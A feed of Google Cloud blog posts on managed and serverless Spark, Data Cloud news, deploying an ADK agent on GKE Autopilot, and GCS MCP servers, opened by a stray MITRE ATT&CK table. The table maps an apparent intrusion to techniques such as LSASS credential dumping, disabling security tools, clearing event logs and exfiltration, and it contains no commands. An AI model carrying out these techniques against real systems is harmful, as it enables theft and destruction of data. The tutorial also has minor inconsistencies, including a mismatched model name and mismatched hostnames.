Tactic	Technique ID	Technique Name
Initial Access	T1566.004	Phishing: Spearphishing Voice
Initial Access	T1133	External Remote Services
Execution	T1204.002	User Execution: Malicious File
	T1059.001	Command and Scripting Interpreter: PowerShell
	T1059.003	Command and Scripting Interpreter: Windows Command Shell
	T1569.002	System Services: Service Execution
Persistence	T1053.005	Scheduled Task/Job: Scheduled Task
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys
Defense Evasion	T1036.005	Masquerading: Match Legitimate Name or Location
	T1553.002	Subvert Trust Controls: Code Signing
	T1562.001	Impair Defenses: Disable or Modify Tools
	T1070.001	Indicator Removal: Clear Windows Event Logs
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory
Credential Access	T1003.002	OS Credential Dumping: Security Account Manager
Discovery	T1083	File and Directory Discovery
	T1135	Network Share Discovery
	T1046	Network Service Discovery
Lateral Movement	T1219	Remote Access Software
	T1021.001	Remote Services: Remote Desktop Protocol
	T1021.004	Remote Services: SSH
Collection	T1005	Data from Local System
Command & Control	T1572	Protocol Tunneling
Exfiltration	T1020	Automated Exfiltration
	T1567.002	Exfiltration Over Web Service: Exfiltration to Cloud Storage
	T1052.001	Exfiltration Over Physical Medium
Impact	T1486	Data Encrypted for Impact

What's new for Managed Service for Apache Spark clusters

Thu, 04 Jun 2026 16:00:00 +0000

At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks.

We recently announced that the Dataproc service is now Managed Service for Apache Spark, reflecting our deep integration with the Agentic Data Cloud.

To support the diverse architectural needs of today’s modern data teams, we offer the service in two distinct deployment modes: serverless and managed clusters. The serverless deployment mode completely abstracts infrastructure management for ephemeral or ad-hoc jobs, while the managed clusters deployment mode is designed for teams that require fine-grained infrastructure customization, persistent environments, long-running stateful processing, or native integration with custom Compute Engine hardware configurations.

When it comes to managed cluster deployments, we’ve re-imagined the experience from the ground up, focusing on three core pillars: making Spark faster by supercharging execution speeds, easier to run by maximizing resource obtainability and reducing operational overhead, and smarter by embedding AI directly into the development and operational lifecycle.

This blog post focuses specifically on what we announced at Google Cloud Next ‘26 for the Managed Spark clusters deployment mode: providing enhanced flexibility to fine-tune performance and cost through native execution engine, smarter scaling policies, and Gemini-powered extensions. For the latest of the serverless deployment mode, check out this blog.

Faster, with the Lightning Engine native execution engine

Arguably the biggest update for Managed Spark clusters is Lightning Engine, which introduces massive performance gains for Spark DataFrame/Dataset APIs and heavy Spark SQL queries. Powered by a native, C++ vectorized execution engine built on Velox and Gluten, with specialized internal enhancements, Lightning Engine bypasses JVM execution bottlenecks by compiling query plans into native instructions optimized for SIMD (Single Instruction, Multiple Data) vectorization.

This native execution engine delivers:

Up to 4.9x faster performance than standard open-source Spark
up to 2x the price-performance over the leading high-speed Spark alternative

Crucially, taking advantage of these performance gains doesn’t require any code changes to your existing Spark applications. Because your jobs complete faster, you directly reduce your aggregate Compute Engine runtime hours and overall spend.

To enable Lightning Engine on your managed clusters, simply specify the Lightning Engine option when you’re creating a cluster.

Learn technical details and hear Lowe’s experience with Lightning Engine

Easier: Maximize resource obtainability via Flexible VMs

Temporary localized shortages of a specific machine type can stall cluster creation or interrupt autoscaling. To dramatically improve cluster resilience against capacity constraints, Flexible VMs for Managed Spark clusters are now generally available.

Flexible VMs allow you to define up to ten ranked machine types for your master, primary, and secondary worker nodes. Managed Service for Apache Spark pairs this preference with automated regional zone placement, dynamically scanning the entire region to fulfill your capacity requests using the best available hardware layout. This helps ensure your pipelines spin up predictably, drastically reducing resource availability errors, and maximizing your ability to capture cost-effective Spot VM capacity during periods of peak demand.

Easier: Zero-scale clusters and scheduled stops

To give you better fiscal control over persistent and developmental environments, we recently announced the general availability of two highly requested FinOps features: zero-scale clusters and cluster scheduled stops.

Zero-scale clusters: You can now provision environments that use exclusively secondary workers (Spot VMs), enabling the cluster to automatically scale down to absolutely zero worker nodes when no processing is active, leaving only the master node online to preserve metadata.
Cluster scheduled stops: This feature lets you configure automated cluster shutdown policies based on specific idle-time limits or a precise future timestamp.

Because these features are natively integrated, they reduce the operational friction of having to delete and reconstruct your environment, while you can stop paying for idle compute overhead during nights and weekends.

Smarter: Managed Service for Apache Spark MCP Server

To bridge the gap between generative AI and data engineering, we launched the Model Context Protocol (MCP) server for Managed Service for Apache Spark. This open-standard integration allows LLMs and AI assistants to securely and dynamically interact with your Managed Spark clusters using natural language.

By utilizing the MCP server, your AI agents can securely connect to your data platform under existing IAM permissions. This allows agents to perform cluster-based operations, such as creating a cluster, submitting a job, or adjusting an autoscaling policy, directly from your AI application.

Smarter: Accelerating AI with the Data Agent Kit

The Google Cloud Data Agent Kit extension allows data scientists, engineers, and developers to manage their entire data workload lifecycle directly within their preferred development environment. We rolled out native support for this extension on Managed Spark clusters, enabling teams to seamlessly build and deploy specialized Data Agents for code generation and data wrangling.

Developers can choose to use Antigravity 2.0, Google's standalone, agentic development platform or bring these agentic capabilities into their preferred IDE including VS Code, Claude Code, or Codex via the Data Agent Kit extensions and plugins. By pairing this streamlined workflow with the raw processing power of managed clusters, these intelligent agents can securely execute complex workflows directly over petabyte-scale data lakes. Specifically, the Data Agent Kit enables developers to:

Build and orchestrate pipelines: Author multi-node data pipelines and generate comprehensive code documentation using natural language.
Perform real-time debugging: Leverage Gemini Cloud Assist to sift through executor logs, pinpoint root causes of job failures, and recommend actionable fixes.
Easily connect to Spark resources: Instantly attach to serverless Spark runtimes or managed clusters without manual network configuration or local Spark installations.
Streamline Git and CI/CD management: Commit, merge, and deploy code directly from your IDE of choice, triggering automated testing and deployment pipelines without friction.

Smarter: Next-generation Lakehouse

We recently launched Lakehouse, which delivers read/write interoperability between engines like Managed Service for Apache Spark and BigQuery. By leveraging the Lakehouse runtime catalog as a unified, serverless metadata layer, it removes data silos and the need for complex translation layers. This agentic-first approach allows organizations to process open formats directly from Google Cloud Storage, or even query remote AWS datasets using the newly introduced cross-cloud Lakehouse, all while maintaining a single source of truth for security and governance.

For customers utilizing Managed Spark clusters, this integration unlocks several powerful new capabilities. Data teams can now accelerate their most demanding ETL and data science workloads by up to 4.9x using the optimized Lightning Engine.

Next-gen runtimes: Cluster Image 3.0 with Spark 4.1

Keeping pace with the open-source ecosystem, we rolled out Cluster Image 3.0 in preview, built with Apache Spark 4.1 and that features an upgraded default Java runtime, Java 21. Spark 4.1 introduces a set of core open-source capabilities, including real-time mode for structured streaming. This enables your Spark environment to support real-time streaming with continuous, sub-second latency processing.

Get started today

These updates are live and ready to use today in Managed Spark clusters! You can enable these new features directly through the Google Cloud console or via the gcloud CLI.

To spin up a new Managed Cluster and natively unlocking the performance of Lightning Engine, run the following command in your terminal:

code_block: <ListValue: [StructValue([('code', 'gcloud dataproc clusters create my-optimized-cluster \\\r\n --region=us-central1 \\\r\n --image-version=2.3 \\\r\n --engine=lightning \\'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9400482b0>)])]>

Alternatively, navigate to the Managed Service for Apache Spark page in the console, click Create cluster, and select ‘Enable Lightning Engine’ under the cluster configuration settings to automatically activate Lightning Engine for your Spark jobs.

We look forward to hearing about the environments you build and run as Managed Service for Apache Spark clusters!

What’s new with Google Data Cloud

Thu, 04 Jun 2026 16:00:00 +0000

June 1 - June 5

Beyond the Query: Powering AI Agents with Bigtable, Firestore & Memorystore
Discover the latest advancements in Google Cloud's NoSQL Database portfolio, including Bigtable, Firestore, and Memorystore. This series is designed for a broad audience: whether you are exploring these databases for the first time or are an existing user looking to leverage the new capabilities announced at Next '26.

Register here to secure your spot!

Cloud Engineer's AI Toolkit Workshops: Solve data-driven challenges with BigQuery, AlloyDB, Gemini and more. Hosted by Google Cloud Labs, this highly technical event is built specifically for Platform Engineers, SREs, and cloud infrastructure teams ready to bridge the gap between AI prototypes and production-grade deployments. Look out for more locations coming soon

Toronto - June 25 (Data Cloud) | RSVP Here
Chicago - June 30 (Data Cloud) | RSVP Here
Start a 10-day Bigtable free trial with a 1 node SSD cluster and up to 500GB of storage capacity. With no credit card required to start, you can easily ingest workloads and manage workloads that require low-latency, high-throughput, and predictable access. Plus, new Google Cloud customers get $300 in free credits on signup.

May 11 - May 15

Managed Service for Apache Airflow has launched a wave of new features, including the general availability of Airflow 3.1, AI-powered agentic troubleshooting, a new managed Airflow MCP Server for custom agent integration, and declarative YAML-based orchestration pipelines—discover all the details in the full blog post.

April 20 - April 24

Google-built ODBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built ODBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for applications to BigQuery and is developed entirely in-house by Google. Download a new driver and connect your application to BigQuery.

April 13 - April 17

We announced we are reintroducing Data Studio to play a significant role in the AI era, expanding from data visualizations and reports to host BigQuery conversational agents and data apps built in Colab notebooks.
We announced BigQuery Graph is now available in preview, offering an easy-to-use, highly scalable graph analytics solution, empowering data professionals to model, analyze and visualize massive-scale relationships in an entirely new way.

April 6 - April 10

We introduced Conversational Analytics for Looker Embedded environments, enabling users to add natural language experiences to their own custom data-driven applications, powered by Gemini.
We expanded Looker’s capabilities for faster ad-hoc analysis, with the introduction of self-service Explores, enabling you to bring your own data to Looker’s semantic layer and gain instant access to insights in a governed data environment.

March 23 - March 27

We showed you how you can scale your reads with Cloud SQL autoscaling read pools. This feature allows you to provision multiple read replicas that are accessible via a single read endpoint and to dynamically adjust your read capability based on real-time application needs.
Our customers are leveraging the full power of Conversational Analytics and Looker to drive major business and technical breakthroughs in the AI era. Companies like Telenor, Pet Circle, Fluent Commerce, Lighthouse Intelligence, Wego, and ROLLER are turning data into insights and actions, grounded by Looker’s semantic layer.

March 16 - March 20

We introduced an enhanced Gemini assistant in BigQuery Studio, transforming the agent from a code assistant into a fully context-aware analytics partner.

February 23 - February 27

We introduced managed and remote MCP support for Google Cloud databases, including AlloyDB, Spanner, Cloud SQL, Bigtable and Firestore, to power the next generation of agents. This announcement extends the ability for AI models to plan, build, and solve complex problems, connecting to the database tools our customers leverage daily as the backbone of their work environment.
We outlined how you can build a conversational agent in BigQuery using the Conversational Analytics API to help you build context-aware agents that can understand natural language, query your BigQuery data, and deliver answers in text, tables, and visual charts.

February 16 - February 20

Our customers are leveraging the full power of Looker to drive major business and technical breakthroughs. Companies like Arrive, Audika, Carousell, Framebridge, GumGum, Intel, Overdose Digital, Ocean Network Express, Subskribe and Promevo are leveraging Looker’s newest AI-driven capabilities, including Conversational Analytics, to transform data to insights and actions, and empower their entire organization with a single source of truth, powered by Looker’s semantic layer.

February 2 - February 6

Join us on March 4 for our webinar, Win Your AI Strategy with Cloud SQL Enterprise Plus, to learn how to power your generative AI workloads with 3x higher performance and 99.99% availability. Register today to discover how to build a scalable, enterprise-grade foundation for your most demanding AI applications.

January 26 - January 30

We introduced Conversational Analytics in BigQuery, which allows users to analyze data using natural language. Conversational Analytics in BigQuery is an intelligent agent that generates, executes and visualizes answers grounded in your business context directly in BigQuery Studio, making data insights for data professionals more conversational.
We outlined how data products have become the foundation for AI agents, providing the context needed to make autonomous agents reliable and trusted for real business use, backed by organized business logic and semantic understanding.
We highlighted how you can supercharge data analytics workflows, and outlined Google Cloud’s AI agent offerings for data engineering, data science, and development tools, so you can integrate agentic workflows in your applications, empower your teams and speed discovery.

January 19 - January 23

We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.
Introducing Google Cloud SQL on MSSQLTips: We are highlighting a new technical guide published on MSSQLTips titled "Introducing Google Cloud SQL." This article serves as an essential resource for SQL Server administrators and developers exploring Google Cloud's fully managed database service. It provides a detailed overview of Cloud SQL capabilities, including high availability, security integration, and the seamless transition of on-premises SQL Server workloads to the cloud, making it an ideal resource for those planning their migration strategy.
We are excited to announce the Public Preview of Microsoft Entra ID (formerly Azure Active Directory) integration with Cloud SQL for SQL Server. Designed to tackle the challenge of identity sprawl in multi-cloud environments, this integration allows organizations to govern database access using their existing Microsoft identity infrastructure. Key benefits include centralized identity management, enhanced security features like Multi-Factor Authentication (MFA), and simplified user administration through direct group mapping. This feature is available for SQL Server 2022 and supports both public and private IP configurations.

January 12 - January 16

Google-built JDBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built JDBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for Java applications to BigQuery and is developed entirely in-house by Google. Download a new driver and connect your Java application to BigQuery.
Troubleshoot Airflow tasks instantly with Gemini Cloud Assist investigations: Cloud Composer just got smarter. We are excited to announce that Gemini Cloud Assist investigations are now available directly within Cloud Composer 3. Instead of manually sifting through raw logs, you can now simply click "Investigate" on a failed Airflow task. Gemini analyzes logs and task metadata to identify failure patterns—such as resource exhaustion or timeouts—and provides actionable recommendations driven by Gemini Cloud Assist to resolve the issue. This integration shifts the debugging experience from manual toil to automated root cause analysis, significantly reducing the time required to restore your pipelines. Learn more about AI-assisted troubleshooting.

Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot

Thu, 04 Jun 2026 07:00:00 +0000

While building AI agents locally using Google’s Agent Development Kit (ADK) is an excellent way to prototype, production-ready agents require a robust, scalable infrastructure. For developers looking to move beyond simple instances and into the world of managed container orchestration, Google Kubernetes Engine (GKE) Autopilot offers the perfect balance of flexibility and ease of use.

In this tutorial, I will walk you through building a technical agent with ADK and deploying it to GKE Autopilot. We will focus on utilizing Gemini on Vertex AI as the core model and ensure highest security standards by implementing Workload Identity for permission management.

Understanding the GKE ADK Architecture

Deploying an ADK agent on GKE Autopilot involves more than just running a container. We leverage GKE's native capabilities to handle scaling and security. Our architecture consists of an ADK-based Python application packaged as a Docker image and stored in Artifact Registry. This container runs as a Deployment on GKE Autopilot, where it communicates securely with Vertex AI using Workload Identity—mapping a Kubernetes Service Account to a Google Cloud IAM Service Account.

To expose the agent to the world, we use the Kubernetes Gateway API, the modern successor to Ingress, which provides a cleaner separation of concerns and native support for Google Cloud Load Balancing.

Prerequisites

Before we begin, ensure you have the following tools and accounts ready:

Python 3.10 or higher.
uv for package management.
Google Cloud SDK (gcloud) installed and configured.
A Google Cloud project with billing enabled.
kubectl command-line tool.
jq for parsing JSON responses.
The following APIs enabled: Kubernetes Engine, Artifact Registry, and Vertex AI.

Step 0: Configuring Google Cloud and Authentication

Before interacting with Google Cloud services, you must authenticate your environment and set the active project. This ensures that both the gcloud CLI and your local Python environment can access Vertex AI.

Login to Google Cloud SDK:
```
gcloud auth login
```
Set your active project:
```
gcloud config set project [PROJECT_ID]
```
Setup Application Default Credentials (ADC): This is crucial for the ADK library to authenticate with Vertex AI during local testing.
```
gcloud auth application-default login
```
Define Environment Variables: To ensure we can easily reuse our configuration in subsequent steps, let's export our project, region, and cluster name as environment variables.
```
export PROJECT_ID=$(gcloud config get-value project)
export REGION=us-central1
export CLUSTER_NAME=adk-cluster
```

Step 1: Provisioning GKE Autopilot

GKE Autopilot is the recommended way to run Kubernetes without managing nodes. It allows you to focus on your agent deployment while Google manages the infrastructure. Starting the cluster creation now allows it to provision in the background while we build the agent.

gcloud container clusters create-auto $CLUSTER_NAME --region $REGION

While the cluster is provisioning, we can move on to building our agent.

Step 2: Building the Agent with ADK

First, let's create our agent. Start by creating a folder for the agent code:

mkdir adk-agent
cd adk-agent

Initialize a new Python project with uv:

uv init

Add dependencies

uv add google-adk

Create a new agent using the adk cli

uv run adk create weather_agent

You will be asked to choose a model for the root agent. Choose gemini-2.5-flash (Number 1). Next you will be asked to choose a backend. Choose Vertex AI (Number 2). Next you will be asked to enter your Google Cloud project ID. Enter your project ID. Next you will be asked to enter your Google Cloud region. Choose a region of your choice. Example: us-central1.

The previous command scaffolded a new directory weather_agent with the following structure:

weather_agent/
├── .env
├── __init__.py
└── agent.py

ADK requires the agent code to be in agent.py file. Let's edit the agent.py file to add a simple tool for the agent.

 from google.adk import Agent
# Define a simple tool for the agent
def get_weather(city: str) -> str:
    """Returns the current weather in a city."""
    return f"The weather in {city} is 90 degrees Fahrenheit and sunny."
# Initialize the agent with Vertex AI and Gemini
root_agent = Agent(
    name="weather_agent",
    model="gemini-2.5-pro",
    tools=[get_weather]
)

The agent.py file is the entry point for the agent. It is used to define the agent and its tools. The get_weather function is a simple tool that returns the current weather in a city. For the purpose of this tutorial, we are using a hardcoded value for the weather. In a real-world scenario, you would use an API to get the current weather.

Step 3: Testing the Agent Locally

Before deploying the agent to GKE Autopilot, we need to test it locally to ensure it works as expected. Run the following command to start the agent in debug mode with the web UI:

uv run adk web

Open http://localhost:8000 in your browser and you should see the ADK web UI. You can then interact with your agent by typing messages in the chat interface.

If the agent returns a message like "The weather in [CITY] is 90 degrees Fahrenheit and sunny." Congratulations! your ADK agent is working. Now you can proceed to the next step.

Step 4: Preparing for GKE Autopilot

The ADK cli has a built-in command to deploy the agent to GKE Autopilot. However the default settings are not suitable for a production environment. For example, the default settings do not use Workload Identity for authentication with Vertex AI and to expose the Web UI via a Load Balancer on port 80.

We will instead manage the lifecycle of the container ourselves. First we need to containerize the agent.

Create a .dockerignore file in the adk-agent directory to prevent your local virtual environment from being copied into the image:

.venv
.adk
__pycache__
*.pyc
.env

Create a Dockerfile for your agent in the adk-agent directory. We will use a multi-stage build to keep the final production image lightweight and secure:

# Stage 1: Build the virtual environment
FROM python:3.10-slim AS builder

# Install uv
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/

# Set working directory
WORKDIR /app

# Force uv to use the system Python and use copy instead of symlinks
ENV UV_PYTHON_PREFERENCE=only-system
ENV UV_LINK_MODE=copy
ENV UV_COMPILE_BYTECODE=1
ENV UV_PYTHON=/usr/local/bin/python3

# Install dependencies
# We copy only files needed for installation to maximize cache
COPY pyproject.toml uv.lock ./
# Note: We don't use --frozen yet as the host lock file might be slightly out of sync
# but sync will update it in the builder stage.
RUN uv sync --no-install-project --no-dev --no-cache

# Copy the agent code
COPY . .
# Sync the project itself
RUN uv sync --no-dev --no-cache

# Stage 2: Runtime image
FROM python:3.10-slim

WORKDIR /app

# Copy the pre-built environment from the builder
COPY --from=builder /app/.venv /app/.venv
# Copy the application code (including weather_agent folder)
COPY . .

# Add the environment to the PATH
ENV PATH="/app/.venv/bin:$PATH"
ENV PYTHONUNBUFFERED=1

# Run the ADK API server
# We point to the weather_agent folder
CMD ["adk", "api_server", ".", "--host", "0.0.0.0", "--port", "8080"]

Build and push the image to Artifact Registry:

# Create repository
gcloud artifacts repositories create adk-repo --repository-format=docker --location=$REGION

# Build and push
gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest

Step 5: Implementing Workload Identity for Security

Security is paramount. Instead of hardcoding API keys, we use Workload Identity to grant the GKE pod permission to access Vertex AI.

1. Create an IAM Service Account:

gcloud iam service-accounts create adk-gke-sa

2. Grant Vertex AI permissions:

gcloud projects add-iam-policy-binding $PROJECT_ID \

    --member="serviceAccount:adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/aiplatform.user"

3. Allow the Kubernetes Service Account to impersonate the IAM SA:

gcloud iam service-accounts add-iam-policy-binding adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com \
    --role="roles/iam.workloadIdentityUser" \
    --member="serviceAccount:$PROJECT_ID.svc.id.goog[default/adk-ksa]"

Step 6: Deploying the Agent to GKE

Now, we define the Kubernetes resources. Create a deployment.yaml that includes the Service Account annotation for Workload Identity. Replace $PROJECT_ID and $REGION with your actual project ID and region.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: adk-ksa
  annotations:
    iam.gke.io/gcp-service-account: adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: adk-agent
spec:
  replicas: 2
  selector:
    matchLabels:
      app: adk-agent
  template:
    metadata:
      labels:
        app: adk-agent
    spec:
      serviceAccountName: adk-ksa
      containers:
      - name: adk-agent
        image: $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits: 
            cpu: "1"
            memory: "1Gi"
        ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: adk-service
spec:
  selector:
    app: adk-agent
  ports:
  - port: 80
    targetPort: 8080

Apply the configuration:

kubectl apply -f deployment.yaml

Check the status of the deployment:

kubectl get pods -w

Once the pods are running, you can use kubectl port-forward to access the agent locally:

kubectl port-forward svc/adk-service 8080:80

Since we deployed the agent without Web UI, we can't access it at http://localhost:8080. However, we can still interact with it using the API and curl.

In a new terminal, run the following commands:

# Create a new session
curl -X POST http://localhost:8080/apps/weather_agent/users/u_123/sessions/s_123

# Run a message
curl -s -X POST http://localhost:8080/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_123",
"sessionId": "s_123",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .

The curl command will return the response in JSON format. The jq command is used to parse the JSON response and display it in a more readable format. . You should see a response like:

{
    "sessionId": "s_123",
    "messages": [
        {
            "role": "assistant",
            "parts": [
                {
                    "text": "The weather in New York today is sunny with a high of 90 degrees Fahrenheit."
                }
            ]
        }
    ]
}

(Optional) Step 7: Exposing via Gateway API and HTTPS load balancer

Finally, we expose the agent using the GKE Gateway API with a Google-managed TLS certificate. This is the recommended, production-grade approach — Google will automatically provision and renew the certificate for your domain.

NB: GKE supports other options to provision certificates. You can use Let's Encrypt with cert-manager, pre-shared certificates, or any other certificate authority. You can check the GKE documentation for more details.

First, reserve a static IP address for your load balancer:

gcloud compute addresses create adk-agent-ip --global
export AGENT_IP=$(gcloud compute addresses describe adk-agent-ip --global --format="value(address)")
echo "Your IP: $AGENT_IP"

Point your domain's DNS A record at $AGENT_IP. Example: adk.mydomain.com

Create a Google-Managed Certificate. Replace adk.yourdomain.com with your actual domain::

gcloud compute ssl-certificates create adk-cert --domains adk.yourdomain.com --global

Create a gateway.yaml with the following content:

# Gateway: HTTPS load balancer with the managed certificate and static IP
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: adk-gateway
spec:
  gatewayClassName: gke-l7-global-external-managed
  listeners:
  - name: https
    protocol: HTTPS
    port: 443
    tls:
      mode: Terminate
      options:
        networking.gke.io/pre-shared-certs: adk-cert
  addresses:
  - type: NamedAddress
    value: adk-agent-ip
---
# HTTPRoute: forward traffic to the ADK service
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: adk-route
spec:
  parentRefs:
  - name: adk-gateway
  hostnames:
  - "api.yourdomain.com"
  rules:
  - backendRefs:
    - name: adk-service
      port: 80
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: adk-health
  namespace: default
spec:
  default:
    checkIntervalSec: 15
    timeoutSec: 5
    healthyThreshold: 1
    unhealthyThreshold: 2
    logConfig:
      enabled: false
    config:
      type: HTTP
      httpHealthCheck:
        port: 8080
        requestPath: /health
  targetRef:
    group: ""
    kind: Service
    name: adk-service

Apply the configuration:

kubectl apply -f gateway.yaml

Certificate provisioning can take up to 20 minutes. Monitor the status with:

gcloud compute ssl-certificates describe adk-cert --global

Once the status shows Active, your agent is live at https://api.yourdomain.com. You can test it with:

# Create a new session
curl -X POST https://api.yourdomain.com/apps/weather_agent/users/u_124/sessions/s_124

# Run a message
curl -s -X POST https://api.yourdomain.com/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_124",
"sessionId": "s_124",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .

Conclusion & Looking Ahead

By following these steps, you have successfully deployed a production-ready AI agent built with ADK onto GKE Autopilot that invokes Gemini on Vertex AI with Workload Identity for authentication. This setup ensures that your agent can scale horizontally to meet demand while maintaining a high security posture.

As you look ahead, consider integrating more complex tools or leveraging GKE's multi-cluster capabilities for even greater resilience. For more details on the technologies used here, explore the official GKE documentation and the ADK repository.

To avoid ongoing charges, remember to delete the GKE cluster and the Artifact Registry repository when finished:

kubectl delete -f gateway.yaml
kubectl delete -f deployment.yaml
gcloud compute addresses delete adk-agent-ip --global
gcloud compute ssl-certificates delete adk-cert --global
gcloud container clusters delete $CLUSTER_NAME --region $REGION
gcloud artifacts repositories delete adk-repo --location $REGION

What’s new in serverless Managed Service for Apache Spark

Wed, 03 Jun 2026 16:00:00 +0000

Whether you use it for data preparation, real-time interactive queries, AI model training, or something entirely different, running Apache Spark at scale is demanding — you shouldn’t have to manage the underlying infrastructure too.

Late last year, we announced the general availability (GA) of our serverless Managed Service for Apache Spark runtime version 3.0, prioritizing speed, simplicity, and reliability. Since then, customer use of Managed Service for Apache Spark for data science has nearly doubled year over year. This is a testament to our belief that using Google Cloud is the easier, smarter, and faster place to run your Apache Spark workloads.

In this blog, let’s dive into a few key features that make our serverless Apache Spark offering a great fit for a wide range of workflows, including feature engineering, GPU-accelerated model training and tuning, semantic search, RAG, building AI agents and applications, and more.

Zero-setup onboarding

The most significant barrier to entry for a cloud service is often the "time to magic moment" — the interval between creating a project and running your first workload. Previously, with serverless Spark, you still needed to manually configure IAM roles, VPC networking, and firewall rules before submitting a single job.

In the serverless Spark 3.0 runtime version, zero-setup onboarding significantly reduces the time to launch your first workload on serverless Spark. It does so by automating the following steps:

Permissions: Necessary IAM roles and permissions are automatically provisioned to the appropriate service accounts.
Networking: Private Google Access is auto-enabled on subnets, and system firewall policies are configured automatically.
API management: Enabling APIs is now more efficient; you can just enable the Managed Service for Apache Spark API instead of manually having to enable several different APIs, as you did previously.

Fast startup for SLA-sensitive workloads

Latency matters, especially for interactive data science and SLA-sensitive batch pipelines. Historically, serverless Spark startup times could take several minutes. With the 3.0 runtime, we’ve dropped startup times by 75% across both standard and premium tiers, delivered automatically without any code or configuration changes and at no additional cost.

This massive improvement qualifies serverless Spark for a much broader range of SLA-sensitive workloads, and we’re always looking to optimize startup times even further.

"Serverless Spark allowed us to quickly reap benefits by removing the need for fine-grain machine management. This drove faster model development and significantly reduced our data processing costs." - César Narnajo, Principal Engineer, Moloco

Better GPU obtainability

Support for Dynamic Workload Scheduler (DWS) Flex Start Mode in the serverless 3.0 runtime version allows serverless Spark to queue customer requests for a configurable duration when GPUs are unavailable. This feature addresses the obtainability challenges for high-demand accelerators like NVIDIA A100 and L4 that are the subject of frequent regional shortages. By pausing workloads until the necessary GPU capacity becomes accessible with DWS, you can dramatically increase obtainability and reliability for your latency-sensitive AI/ML workloads.

First-class support for Apache Spark 4.x

The serverless Spark 3.0 runtime version supports current and upcoming Apache Spark 4.x innovations, including Spark Connect, which supports a decoupled client-server architecture that enables remote connectivity from any client.

Enhanced multi-zonal support

To protect global enterprise workloads from zonal outages or hardware stockouts, the serverless Spark 3.0 runtime introduces enhanced multi-zonal support by default. The service can now automatically allocate execution nodes across multiple zones within a single region to help ensure obtainability.

Crucially, we do not charge for cross-zonal network traffic between nodes in a region, providing high availability without the traditional multi-zone tax. This is another benefit that you can realize by bringing your global Apache Spark workloads to Google Cloud.

Looking ahead

In addition to the above, we’re also continuing to innovate and push the boundaries of ease of use in areas such as history-based autotuning and goal based autoscaling.

Get started today

You can take advantage of these features today by specifying runtime_version: 3.0 in your batch workloads or interactive sessions. To run your first workload on serverless Spark, perform the following simple steps:

Enable the Managed Service for Apache Spark API.
If you aren’t the project owner, ask your project admin for the serverless Managed Service for Apache Spark Editor (roles/dataproc.serverlessEditor) role on the project.

Now you’re ready to start running your workloads on the Serverless 3.0 runtime version. For more details, visit our updated documentation and access serverless Managed Service for Apache Spark in the Google Cloud console.

Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers

Tue, 02 Jun 2026 17:00:00 +0000

Google Cloud Storage (GCS) is a foundational component of the modern agentic tech stack and the preferred home for unstructured data at scale. As enterprises deploy agents in production, the critical focus has shifted to turning data into context and building secure, standardized integrations to access context. This is the core of smart storage: making unstructured data inherently agent-ready by turning passive objects into rich context for reasoning. Whether it’s automating complex financial workflows or diagnosing system failures in seconds, AI success now depends on how seamlessly agents can leverage this intelligence to make smart, high-stakes decisions.

In this blog, we will share three examples of agents built by customers using GCS, and then share how you can securely and reliably connect your agents to GCS using Model Context Protocol (MCP). Combined with smart storage features like auto annotations and object contexts, GCS MCP server makes the whole agent deployment process easy and simple.

Real-world agent success on Google Cloud Storage

We are seeing incredible innovation from customers leveraging MCP and Google’s agentic tech stack to solve complex business problems:

Palo Alto Networks built the Strata Co-Pilot agent, a screen-aware AI assistant that guides network security administrators through complex configuration flows—either by highlighting steps or executing them directly. The agent is powered by the Gemini Live API, with GCS serving as its “historical memory” connected via the GCS MCP server.
Airwallex developed an AI Assistant that understands user context, answers questions, and executes workflows on their behalf. For example, it can smartly analyze expense policy documents and generate detailed approval workflows - a task that would normally take hours to do manually. GCS and GCS metadata are used by the agent to store documents and the extracted information, respectively.

Snap's Job Optimization Agent analyzes Flink and Spark job specs, metadata, and historical metrics stored on GCS across thousands of jobs to find optimization opportunities, generate cost estimates, and tune configurations. Using this agent, Snap is already seeing investigation time reduced from 30 minutes to 30 seconds!

In all these three agents, the GCS MCP server handles data operations as well as enforces standard RBAC and access policies.

Connecting agents to GCS using MCP

